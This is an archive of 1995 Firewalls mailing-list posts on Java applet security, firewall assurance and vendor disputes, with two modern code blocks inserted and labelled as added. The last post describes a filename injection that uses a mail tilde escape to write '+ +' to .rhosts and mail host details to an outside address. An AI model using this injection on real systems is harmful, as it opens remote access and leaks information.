So you might say "Well Gee, so what CAN you write in Java?" Java provides a single (pretty big actually) loophole called "native" methods. A native method is one that is implemented in a non-Java language (typically C or C++). Native methods are capable of type unsafe operations, peering into the private underparts of objects, stomping memory, what have you. So called "Dangerous" capabilities are encapsulated in object classes whose methods are implemented in C. (This includes things like class Object, and class Class for example). Native methods are _never_ allowed in imported (and untrusted) code. To be a native method the class file must set the Native attribute for the method, if the native attribute is set the class is rejected, if the class has no native methods initially, it cannot add one later. Nor can it load its own classes.

So in the literal sense, a virus must find a way of propagating itself to the target system. And that would require it to be able to "write itself" somehow. It can't get access to the native system directly, and we won't let it have access through our classes (like FileOutputStream).

Anyway, so to some extent *Java* is not a general purpose language, however the Java *system* is a general purpose application development environment. This level of separation gives exceptional security controls to the system.

Anyway, think about it some more, read the language spec (there is an even better one in the works but it probably won't be out for a couple of months), let me know if I can clarify anything you've read, and then let me know where you see problems (if any)

--Chuck

From firewalls-owner Fri Sep 15 15:48:13 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA29065 for firewalls-outgoing; Fri, 15 Sep 1995 14:39:04 -0700
Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [26.1.0.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA29050 for ; Fri, 15 Sep 1995 14:38:55 -0700
Date: Fri, 15 Sep 95 17:35 EDT
From: Wilner@DOCKMASTER.NCSC.MIL
Subject: Re: firewall certification authority
To: firewalls@GREATCIRCLE.COM
Message-ID: <950915213527.024437@DOCKMASTER.NCSC.MIL>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ranum writes:
>> Design-oriented testing . . . [starts] with the
>> question: "Why do you think this firewall
>> protects . . . itself effectively?"

It would be more appropriate to ask, "Why do you think the platform atop which the firewall executes protects the firewall effectively." Since the firewall obviously depends upon the mechanisms and assurances provided by the underlying O/S to implement its own mechanisms, a firewall that protects itself well but that sits atop a shaky, low-assurance platform is essentially a house of cards. If component C1 of the firewall attempts to perform some verification upon component C2 and must rely upon operating system mechanism M to do it we are in deep trouble if the means by which M is invoked, or the sanctity of M itself, is compromised. I think vendors know this, but it's obviously easier to quickly slap together a firewall and sell it than to take pains to integrate firewall software atop a trusted O/S base.

>> I've heard scary stories of people doing "firewall testing"
>> who do not understand UNIX. So, for example, they will tell
>> you the firewall is insecure if the sendmail executable has
>> not been deleted.

Maybe they understand UNIX better than you think. Hearkening to the battle cry of "least privilege," it is clear that executables should not be left on the system if these executables could invite trouble should someone succeed in launching them. The fact that "no one can get to them" because the firewall is in place is irrelevant: observe that we customarily strip down "gateway boxes," deleting compilers and linkers and so forth, even though no unprivileged user logins are allowed on the system and these tools "can't be executed" anyway.
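A check for the "stripped-down gateway box" practice Wilner describes, added here as an example rather than anything from the thread: it walks a filesystem for executables a bastion should not carry. The tool names and the idea of searching the whole tree (vendors put compilers in /usr/bin, /usr/ccs/bin and elsewhere) are assumptions; extend the list for your platform.

```shell
#!/bin/sh
# Added example (not from the list message): audit a gateway/bastion host for
# the executables Wilner says should be deleted (compilers, linkers, the
# sendmail binary). The tool names below are assumptions; add your own.
STRIP_NAMES="cc gcc ld as make sendmail"

# list_stripped_tools ROOT: print every regular file below ROOT that has the
# owner-execute bit set and whose basename is in STRIP_NAMES, one path per
# line, sorted. The whole tree is searched because canonical locations differ
# between systems (/usr/bin, /usr/ccs/bin, /usr/lib/sendmail, ...).
# ROOT defaults to /, which on a real host means running as root.
list_stripped_tools() {
    root="${1:-/}"
    name_expr=""
    for name in $STRIP_NAMES; do
        name_expr="$name_expr${name_expr:+ -o} -name $name"
    done
    # $name_expr is deliberately unquoted so it expands to separate find args.
    find "$root" -type f -perm -100 \( $name_expr \) -print 2>/dev/null | sort
}

# count_stripped_tools ROOT: number of such files; 0 means the box is clean.
count_stripped_tools() {
    list_stripped_tools "$1" | wc -l | tr -d ' '
}

# Typical use on the gateway itself:
#   . ./audit_gateway.sh && list_stripped_tools / && echo "found: $(count_stripped_tools /)"
```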
From firewalls-owner Fri Sep 15 16:00:07 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA02621 for firewalls-outgoing; Fri, 15 Sep 1995 15:34:10 -0700
Received: from puddytat.intecom.com (puddytat.intecom.com [192.246.135.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA02610 for ; Fri, 15 Sep 1995 15:34:05 -0700
Received: (from mbrennen@localhost) by puddytat.intecom.com (8.6.12/8.6.12) id RAA12953; Fri, 15 Sep 1995 17:30:52 -0500
Date: Fri, 15 Sep 1995 17:30:52 -0500 (CDT)
From: Michael Brennen
To: Shawn Steele
cc: Firewalls@GreatCircle.COM
Subject: Re: Any known security holes in the "vacation" program
In-Reply-To: <9509151323.ZM4018@aob.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 15 Sep 1995, Shawn Steele wrote:
> If all you are looking for is an auto-responder, it usually isn't very
> difficult to create a small program to scan for From: & Reply-To:

O'Reilly's MIIS describes a general purpose one called "canned_reply".
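An auto-responder of the kind Shawn Steele sketches (scan From: and Reply-To:, send a preformatted reply), written here as an added example; it is not canned_reply, vacation, or any code from the thread. It adds the two loop guards Neil Readwin's story calls for: a reply database that is created on first use, so a missing file never means "answer every mail", and a refusal to answer bulk, list or automatically generated mail. The file and address names are assumptions.

```python
"""Added example (not from the thread): minimal auto-responder with loop guards."""
import email
import json
import os
import re
from email.message import EmailMessage
from email.utils import parseaddr

# Local parts that must never receive a reply: daemons and list machinery whose
# own automatic mail would otherwise bounce back and forth with ours.
NEVER_REPLY = re.compile(
    r"mailer-daemon|postmaster|root|daemon|owner-.*|.*-request|.*-owner", re.I)


def pick_reply_address(msg):
    """Address to answer: Reply-To if present, else From, else None."""
    for header in ("Reply-To", "From"):
        _, addr = parseaddr(msg.get(header, ""))
        if addr and "@" in addr:
            return addr.lower()
    return None


def is_automatic(msg):
    """True for mail a responder must leave unanswered to avoid reply loops."""
    if msg.get("Precedence", "").lower() in ("bulk", "junk", "list"):
        return True
    if msg.get("Auto-Submitted", "no").lower() != "no":
        return True
    return msg.get("List-Id") is not None


def load_db(path):
    """Load the reply database, creating an empty one if it does not exist.
    vacation(1) tracks senders only when its database already exists; here an
    absent file means 'nobody answered yet', never 'answer everyone'."""
    if not os.path.exists(path):
        save_db(path, {})
    with open(path) as fh:
        return json.load(fh)


def save_db(path, db):
    with open(path, "w") as fh:
        json.dump(db, fh)


def decide(raw_message, db):
    """Return (address to answer or None, reason); records the address in db."""
    msg = email.message_from_string(raw_message)
    if is_automatic(msg):
        return None, "automatic or bulk mail"
    addr = pick_reply_address(msg)
    if addr is None:
        return None, "no usable sender address"
    if NEVER_REPLY.fullmatch(addr.split("@", 1)[0]):
        return None, "daemon or list address"
    if addr in db:
        return None, "already answered"
    db[addr] = True
    return addr, "send canned reply"


def build_reply(raw_message, to_addr, from_addr, canned_text):
    """Compose the canned reply, marked so other responders will not answer it."""
    original = email.message_from_string(raw_message)
    reply = EmailMessage()
    reply["From"] = from_addr
    reply["To"] = to_addr
    reply["Subject"] = "Re: " + original.get("Subject", "(no subject)")
    if original.get("Message-ID"):
        reply["In-Reply-To"] = original["Message-ID"]
    reply["Precedence"] = "bulk"            # the marker we honour ourselves
    reply["Auto-Submitted"] = "auto-replied"
    reply.set_content(canned_text)
    return reply


def respond(raw_message, db_path, from_addr, canned_text):
    """Process one incoming message: return the reply to hand to sendmail,
    or None when the message must not be answered. Persists the database."""
    db = load_db(db_path)
    addr, _reason = decide(raw_message, db)
    if addr is None:
        return None
    save_db(db_path, db)
    return build_reply(raw_message, addr, from_addr, canned_text)


if __name__ == "__main__":
    # Constructed sample standing in for a message read from stdin via .forward.
    sample = "From: Alice <alice@example.org>\nSubject: info please\n\nHello\n"
    addr, reason = decide(sample, {})
    print(addr, reason)                      # alice@example.org send canned reply
```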
From firewalls-owner Fri Sep 15 16:02:44 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA02710 for firewalls-outgoing; Fri, 15 Sep 1995 15:35:46 -0700
Received: from mickey.ovid.com (mickey.ovid.com [198.242.51.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA02702 for ; Fri, 15 Sep 1995 15:35:41 -0700
Received: by mickey.ovid.com (AIX 3.2/UCB 5.64/3.1.090690-Ovid Technologies) id AA13067; Fri, 15 Sep 1995 16:31:39 -0600
Date: Fri, 15 Sep 1995 16:31:39 -0600 (MDT)
From: Adam Prato
To: mramirez@imparcial.com.mx
Cc: firewalls@greatcircle.com
Subject: Re: Help with CISCO 2511
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 12 Sep 1995 mramirez@imparcial.com.mx wrote:
> I have a CISCO 2511, with 10 modems connected (Hayes Accura 144 + 14400 FAX).
> I'm having problems trying to configure the receiving modems to support
> 14,400 bps from the callers.
> Actually my users only can connect to the modems at 9600 bps, and the
> technical support from CISCO told me that I have to change my modems to
> 28,800 bps, that's the only way that my receiving modems can receive calls
> at 14,400 bps.
> It's true?? , because I think that is some problem with the configuration
> of the CISCO (in dedicated or interactive mode)
>
> Thanks..

I don't think so. But try this:

1) Make sure all dipswitch settings are correct for the modems
2) logon to router's console (not telnet) and enable privileged mode
3) config term
4) line 1 10
5) modem in out
6) ctrl-c (exit config-line)
7) telnet to the router at port 20xx - where the XX refers to the line of the modem, from 01 to 10.
8) issue the necessary AT commands to communicate with the modem. Configure the modem to autoanswer (ATS0=1) and any other modem settings (&c1&d3 and so on, so forth)
9) exit by pressing escape sequence. Default on cisco is ctrl-shft-6-x
10) clear line XX where XX is the line you just configured

That's it. Logoff the router (ignore any errors about open connections) and dial in.

Adam

From firewalls-owner Fri Sep 15 16:12:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA29948 for firewalls-outgoing; Fri, 15 Sep 1995 14:51:24 -0700
Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA29926 for ; Fri, 15 Sep 1995 14:51:13 -0700
Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id QAA10466 for ; Fri, 15 Sep 1995 16:53:47 -0500
Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 181050000; 15 Sep 95 17:50 CDT
Received: from sctc.com by sccmailhost.sctc.com id 187940000; 15 Sep 95 17:50 CDT
Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id QAA25904; Fri, 15 Sep 1995 16:49:51 -0500
Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA10307; Fri, 15 Sep 1995 16:49:51 -0500
Date: Fri, 15 Sep 1995 16:49:51 -0500
From: Rick Smith
Message-Id: <199509152149.QAA10307@shade.sctc.com>
To: firewalls@greatcircle.com
Cc: smith@sctc.com
Subject: Re: Secure version of Sendmail
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Frank Willoughby writes:
>The implication in the above statement is that the Mail Guard
>functions as a firewall. Not True. The SNS Mail Guard does
>*not* function as a firewall.
> [further unhappy comments omitted]

Frank, I don't know what kind of secure connectivity problem you are trying to solve. In practice *I* don't talk about the Guard as a "firewall" since it's not excessively useful as an "Internet firewall." But in terms of the basic definition, it passes in flying colors. Permit me to steal from Cheswick & Bellovin:

* all traffic between inside and outside pass through it
* only authorized traffic is passed, based on a security policy
* the device is immune to penetration

Well, as much as anything can be "immune." The Guard takes 3 out of 3.

> I was told by a salesman who represented
>the Sidewinder that it was blessed by the gov't powers-that-be as
>*the* gov't sanctioned firewall. Hogwash.

Are we speaking of the Mail Guard or Sidewinder? These are *completely* separate products. I don't know of any special government endorsement of Sidewinder, either. It *is* true, however, that the Mail Guard is endorsed for moving e-mail between classified and unclassified networks, and is probably the only device so endorsed.

> I will vehemently
>oppose any claims that the Mail Guard is a firewall - Internet or
>otherwise.

I am willing to believe you have an application that requires security mechanisms you've seen in some firewall products, and that the Mail Guard doesn't have the mechanisms you need. However, that doesn't mean Mail Guards (or other types of multilevel guards) are not some class of firewall by definition. But the word "guard" is better to use.

> It isn't necessary to mis-represent a product in order
>for it to sell - particularly in the (justified) paranoia of CEO's
>& CIO's who break into a cold sweat at the thought of doing business
>on the Internet.

I fully agree, and so do the sales folks that I work with here. Bogus statements are counterproductive in the security business. Most customers need technical buy-in before the sale takes place, so any misrepresentation is probably going to be caught. Then the sales effort becomes a waste of time for the sales folks as well as angering a potential customer. NOBODY benefits from this.

Rick.
smith@sctc.com secure computing corporation From firewalls-owner Fri Sep 15 16:15:59 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA26407 for firewalls-outgoing; Fri, 15 Sep 1995 14:03:13 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA26379 for ; Fri, 15 Sep 1995 14:03:02 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id QAA10188 for ; Fri, 15 Sep 1995 16:05:16 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 175600000; 15 Sep 95 17:01 CDT Received: from sctc.com by sccmailhost.sctc.com id 184670000; 15 Sep 95 17:01 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id QAA24477; Fri, 15 Sep 1995 16:00:59 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA07051; Fri, 15 Sep 1995 16:00:58 -0500 Date: Fri, 15 Sep 1995 16:00:58 -0500 From: Rick Smith Message-Id: <199509152100.QAA07051@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Secure version of Sendmail Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank Willoughby writes: >If I remember right, the Orange Book does *not* permit classified and >unclassified users on the same system - even if the system has been >certified as A1. Probably for good reason. A nit: the Orange Book is silent on this. It's an issue of DOD policy and site specific accreditation decisions. Some "interim" decisions implemented in practice would probably curl your hair. >In my experience in the information security field, there is no such >thing as a "nonbypassible access control mechanism" of an O/S. Anything >can be compromised. It is a simple matter of how much time, manpower, >resources, and/or money you are willing to spend to accomplish your >objective. 
I use the term "nonbypassable access control" in the Orange Book sense of a reference monitor mechanism that is applied to all access control decisions and that can not be disabled by the user. I use it to distinguish Type Enforcement protections from conventional Unix style protections. Unix protections can be overridden by a sufficiently powerful system user while T.E. protections can not. In the pure sense T.E. is no more "nonbypassable" than any other computer based mechanism, like the Kernel/User mode access control mechanisms present in most processor architectures. >If the target is a host, there is a significant penetration problem when >dealing with sendmail. However, if the target is an application gateway >(firewall), then the penetration attack is handled at the application >layer & (if done right - which most reputable firewall vendors do) the >attack never gets to the O/S. The point is, even the most perfect vendor in the world is not going to block a mail server hole that hasn't already been found and fixed. What if this attacker found it first? The O/S level protection (Type Enforcement) is there to handle that very real threat. Rick. 
smith@sctc.com secure computing corporation

From firewalls-owner Fri Sep 15 17:15:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA07997 for firewalls-outgoing; Fri, 15 Sep 1995 16:46:13 -0700
Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA07976 for ; Fri, 15 Sep 1995 16:46:07 -0700
Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id SAA11373 for ; Fri, 15 Sep 1995 18:48:42 -0500
Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 193530000; 15 Sep 95 19:45 CDT
Received: from sctc.com by sccmailhost.sctc.com id 195730000; 15 Sep 95 19:44 CDT
Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id SAA28040; Fri, 15 Sep 1995 18:44:19 -0500
Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id SAA14646; Fri, 15 Sep 1995 18:44:18 -0500
From: Rick Smith
Message-Id: <199509152344.SAA14646@shade.sctc.com>
Subject: Re: Secure version of Sendmail
To: firewalls@greatcircle.com
Date: Fri, 15 Sep 1995 18:44:18 -0500 (CDT)
Cc: Rick Smith
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 2696
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Frank Willoughby presents his bones of contention:

>1) The Sidewinder was claimed to firewall a number of government agencies
> as part of an approved configuration.

I know that Sidewinder is in use at several government agencies. So is the Mail Guard. There is at least one site whose network incorporates both SNSes and Sidewinders.

> What was represented to me was that the
> Sidewinder was acting as a firewall in the approved configuration.

In other words, some sales person tried to impress you with technical data that turned out to be wrong.
As I said before, the sales people I've worked with here try hard to get their facts straight. The SNS and Sidewinder configuration in question has been demo'ed at trade shows. I can see how a sales person could get the details turned around. Sales people _always_ interpret things in the best possible light for the product. It's how they work, and the sort of mistake they're likely to make, even as they try to be accurate.

In any case, a decision to buy Sidewinder *can* and *should* be based on a solid technical evaluation of security issues and not on alluring imagery, like its use to Keep Bits Safe For Democracy, or even Stopping Hackers at Defcon.

>2) The Sidewinder was supposed to have the capability of reading mails when
> delivered and blocking mails which may have a sensitive content - based
> on a keyword search.
> It still doesn't. An acquaintance of mine from another company talked
> to the engineering staff at Secure Computing. According to them, the
> mail-reading capability won't be delivered. Ever.

Content based filtering for e-mail will be released this fall.

>3) The Sidewinder was supposed to be able to filter/restrict applications &
>protocols to inbound, outbound, both, or none.
> When it was delivered, it only had *all* or *nothing*. If ftp or
> telnet were turned on, *bidirectional* access was turned on. 8^(
> A serious security problem in my humble opinion. Granted this problem
> was taken care of in the last release, but it should never have happened

Sidewinder 2.0 filters/restricts application protocols to inbound, outbound, both, or none. The earlier Sidewinder release restricted protocols by just not providing them. It supported e-mail, DNS, and an external, protected Web server. It didn't provide proxy services for FTP or Telnet.

I'm really sorry about any misunderstandings. As I stated before, it just wastes time for people to mislead each other. Even our sales folks believe that. We want to get it right and we're trying to get it right.
Rick.
smith@sctc.com secure computing corporation

From firewalls-owner Fri Sep 15 17:17:33 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA06359 for firewalls-outgoing; Fri, 15 Sep 1995 16:25:06 -0700
Received: from motgate.mot.com (motgate.mot.com [129.188.136.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA06347 for ; Fri, 15 Sep 1995 16:25:01 -0700
Received: from pobox.mot.com (pobox.mot.com [129.188.137.100]) by motgate.mot.com (8.6.11/8.6.10/MOT-3.8) with ESMTP id SAA02561 for ; Fri, 15 Sep 1995 18:23:47 -0500
Received: from MACCVM.CORP.MOT.COM (maccvm.corp.mot.com [129.188.244.1]) by pobox.mot.com (8.6.11/8.6.10/MOT-3.8) with SMTP id SAA16248 for ; Fri, 15 Sep 1995 18:23:46 -0500
Received: from MACCVM by MACCVM.CORP.MOT.COM (IBM VM SMTP V2R3) with BSMTP id 9256; Fri, 15 Sep 95 16:23:44 MST
Date: 15 Sep 1995 16:23:43 -0700
Message-ID: <"XOPR85 95/09/15 23:23:43.920960"@MACCVM.CORP.MOT.COM>
From: Jacob Hinther
To: Firewalls
Subject: Secure Web Proxy Server
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Greetings:

Can anyone recommend a commercial web proxy server with security that is significantly better than that provided by Netscape? I know this is not a Firewall question but I consider you to be THE security experts and I have respect for your opinion.
Thanks,
Jake

From firewalls-owner Fri Sep 15 20:00:12 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA15518 for firewalls-outgoing; Fri, 15 Sep 1995 19:46:39 -0700
Received: from voga.rmit.EDU.AU (voga.rmit.EDU.AU [131.170.1.20]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA15511 for ; Fri, 15 Sep 1995 19:46:32 -0700
From: S9204286@pitvax.xx.rmit.edu.au
Received: from pitvax.xx.rmit.EDU.AU by voga.rmit.EDU.AU with SMTP id AA16234 (5.65c/IDA-1.5/qva1-oz for ); Sat, 16 Sep 1995 12:45:18 +1000
Received: from pitvax.xx.rmit.edu.au by pitvax.xx.rmit.edu.au (PMDF V4.3-7 #2554) id <01HVCEDS9EJ48WZPNV@pitvax.xx.rmit.edu.au>; Sat, 16 Sep 1995 12:48:00 +1000
Date: Sat, 16 Sep 1995 12:48:00 +1000
Subject: Looking for firewall info
To: Firewalls@GreatCircle.COM
Message-Id: <01HVCEDSB0EQ8WZPNV@pitvax.xx.rmit.edu.au>
X-Envelope-To: Firewalls@GreatCircle.COM
X-Vms-To: IN%"Firewalls@GreatCircle.COM"
Mime-Version: 1.0
Content-Transfer-Encoding: 7BIT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Date sent: 16-SEP-1995 12:37:08

Hi, I was wondering if anyone here would be able to help me. I am a 3rd year computer science student in Australia and am doing a research project on firewalls in relation to network security ie what they are, how they work, types, implementation and so on. I have been lurking in this mailing list for a while now and it is mostly techie discussion and not really what I need. If anyone can point me in the right direction I would very much appreciate it.

Thank you.

=======Ian McNab s9204286@pitvax.xx.rmit.edu.au=============
"Suddenly I knew that you'd have to go,
Your world was not mine, your eyes told me so,
Yet it was there I felt the crossroads of time
And I wondered why." - L.M.
============================================================

From firewalls-owner Fri Sep 15 22:30:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA18547 for firewalls-outgoing; Fri, 15 Sep 1995 22:27:55 -0700
Received: from disperse.demon.co.uk (disperse.demon.co.uk [158.152.1.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA18540 for ; Fri, 15 Sep 1995 22:27:47 -0700
Received: from post.demon.co.uk by disperse.demon.co.uk id aa08097; 16 Sep 95 0:46 +0100
Received: from bagpuss.demon.co.uk by post.demon.co.uk id aa08146; 16 Sep 95 0:43 +0100
Received: (karl@localhost) by bagpuss.demon.co.uk (3.1/3.1) id TAA03849; Fri, 15 Sep 1995 19:48:57 +0100
From: Karl Strickland
Message-Id: <199509151848.TAA03849@bagpuss.demon.co.uk>
Subject: Re: wank worm
To: Mark
MMDF-Warning: Unable to confirm address in preceding line at disperse.demon.co.uk
Date: Fri, 15 Sep 1995 19:48:57 +0100 (BST)
Cc: frankw@in.net, proff@suburbia.net, firewalls@greatcircle.com
MMDF-Warning: Unable to confirm address in preceding line at disperse.demon.co.uk
In-Reply-To: <199509150448.AA41538@junkers.lochard.com.au> from "Mark" at Sep 15, 95 03:48:07 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 508
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> >I doubt you want this particular fortune file for your program as the
> >messages generated by the fortune cookie in the wank worm were obscene
> >& vulgar.
>

Smart, can you please post a copy to the list.

Cheers

--
------------------------------------------+-----------------------------------
Mailed using ELM on FreeBSD | Karl Strickland
PGP 2.3a Public Key Available.
| Internet: karl@bagpuss.demon.co.uk |

From firewalls-owner Sat Sep 16 01:00:01 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA20428 for firewalls-outgoing; Sat, 16 Sep 1995 00:39:04 -0700
Received: from Csli.Stanford.EDU (Csli.Stanford.EDU [36.9.0.46]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA20421 for ; Sat, 16 Sep 1995 00:39:00 -0700
Received: from Csli.Stanford.EDU (localhost.Stanford.EDU [127.0.0.1]) by Csli.Stanford.EDU (8.6.11/8.6.11) with ESMTP id AAA24133; Sat, 16 Sep 1995 00:37:30 -0700
Message-Id: <199509160737.AAA24133@Csli.Stanford.EDU>
To: kahar@sebank.se
cc: firewalls@GreatCircle.COM
Subject: Re: IBM NetSP
In-reply-to: Your message of Fri, 15 Sep 1995 09:51:59 CDT. <199509151452.JAA11534@psisa.com>
Date: Sat, 16 Sep 1995 00:37:28 -0700
From: Christian Wettergren
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I'm looking for comments and experiences with IBMs NetSP, Secured Network
> Gateway version 1.2. How does it compare to other products like BorderWare
> and FireWall-1?

Hi Katarina! (Hej Katarina! :-))

I'm a customer at SE-Banken, and I hope you know what you're doing. :-) I'll jump to conclusions for a while below, and will most certainly exaggerate what you might actually be planning. Hope it is ok with you, perhaps being rather safe than sorry?

I don't like my bank being connected to the net. And no matter what the sales reps say, or anyone else here for that matter either, I don't think that any of the current products are good enough to be able to compensate for the kind of attacks that would be possible given the payoff of attacking a bank. I mean, most of the data you are carrying can be converted into hard cash in a matter of days, in innumerable ways. Leaking of strategic information, privacy invasions of people, account numbers, stock information, secret passwords used internally and then reused at more critical sites etc.
I would also say that you could not have an ordinary firewall in your organisation. You could not allow employees to connect out, via for example Netscape/WWW, since it would be far too easy to trick them into downloading malicious data. There are simply too many weaknesses in the viewers of today, I would state. I actually can't see any safe use of Internet access for almost any of your employees, not right now at least (being in shock, seeing scenarios of my money being swept away by the infamous Swedish Hacker Association, :-( )

Do you care to tell me what your plans with your Internet access are? As I am a customer of yours? Either in private through email, or publicly here? You would probably end up with an interesting and enlightening discussion if you did it publicly. :-)

Also note that there is a parallel thread of discussion going on right now, that was started by one of the more well-known experts on this list, Marcus J Ranum. His triggering letter said basically, "when will people see that we don't have any clothes?", ie. there is today no security that can counter an attack by someone with sufficient resources. I believe banks will be in a new class of Internet sites, that will have much more powerful attackers.

And don't even consider starting any serious home banking for a couple of years. Things have to shake down a bit first. Rumor has it the phone banks have had some problems - you'll be even worse off here!

Ok, that's it for paranoia and panic right now. Back to normal pitch of voice. :-)

I can tell you I have applied for money for a Swedish Computer Emergency Response Team. Others have too, so there will most likely emerge such a beast in Sweden within a year. I'm sure we could do some very useful preventive discussions, and share some of the experiences of Internet security with you.
One good trick to get an estimate of how good a firewall actually is, is to try to get an insurance company to issue an insurance against losses caused by its failed operation. The limit of the insurance will show you to what extent you can trust the firewall. (And if the limit is too high, you just gained by this exercise.)

Don't hesitate to contact me directly, in any of the following ways:

Christian Wettergren
KTH/Teleinformatics
cwe@it.kth.se
phone: 08 - 752 14 91
fax: 08 - 751 17 93
(guest at Stanford another week, you can reach me at cwe@csli.stanford.edu, phone: +1 415 328 08 48, 9 hour time diff.)

Regards, and sorry for the ranting,
Christian Wettergren

From firewalls-owner Sat Sep 16 02:00:06 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA22438 for firewalls-outgoing; Sat, 16 Sep 1995 01:38:54 -0700
Received: from Csli.Stanford.EDU (Csli.Stanford.EDU [36.9.0.46]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA22423 for ; Sat, 16 Sep 1995 01:38:46 -0700
Received: from Csli.Stanford.EDU (localhost.Stanford.EDU [127.0.0.1]) by Csli.Stanford.EDU (8.6.11/8.6.11) with ESMTP id BAA27134; Sat, 16 Sep 1995 01:37:15 -0700
Message-Id: <199509160837.BAA27134@Csli.Stanford.EDU>
To: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
cc: firewalls@GreatCircle.COM, kjj@pondscum.phx.mcd.mot.com
Subject: Re: I wish Java would go away ...
In-reply-to: Your message of Fri, 15 Sep 1995 15:24:15 PDT. <9509152224.AA20137@pepper.Eng.Sun.COM>
Date: Sat, 16 Sep 1995 01:37:14 -0700
From: Christian Wettergren
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

| >'impossible' is such an interesting word to fling around security
| >folks...
|
| On the contrary it is exactly the word to use. Most security experts
| will choose to take the hypothesis "It is possible to write a virus
| in Java" and then try to prove it.
| I for one am interested in all such
| attempts to prove this and will help with any information I can provide.
| Were it actually possible we'd be stupid not to change Java instantly
| to prevent it.

But aren't you assuming people will follow the rules you've set up for this game? You say things like "in Java", and "impossible".

* It is not impossible given stupid users that disable your restrictive defaults, setting READPATH==WRITEPATH==everywhere? You leave a heavy burden on the security officer, since Java is so extensibly configurable. This might be the thing that tips the balance, so to say.

* you say "within JAVA", assuming somehow that _only Java will be used_ for a virus? there are plenty of other bits and pieces out there that together with Java might make up a virus. The problem of virii has changed somewhat, as is shown by the Word 6 virus. You are reasoning about virii on *one* level, the byte code level. But what about higher-level virii?

* The messiness of it all. Java opens up a lot of unexpected information and modification pathways. These new changes might change the security analysis of *another* program in a significant way, that *together* might become a major security problem.

1/ java applet downloaded, does something neat, and also at the same time deposits a file in the allowed file space, containing malicious data. Let's say that its filename is

'look \n
~!echo + + > ~/.rhosts; echo $user `hostname` > mail anon@remail.org'

(that was the filename.)

it also makes the file setuid/setgid or something like that. Something that will make most logging systems notice.

2/ during the night the security audit starts, and walks through the file tree with something like this;

find /home -perm 4000 -print | mail staff@$50.com

This will generate perfectly legitimate input to the mail program.

illegal file(s) found!
Files:
look
~!echo + + > ~/.rhosts; echo $user `hostname` > mail anon@remail.org

mail understands the ~!
to be a shell escape, that is executed. The intruder will have a couple of hours before the admin reads this mail.

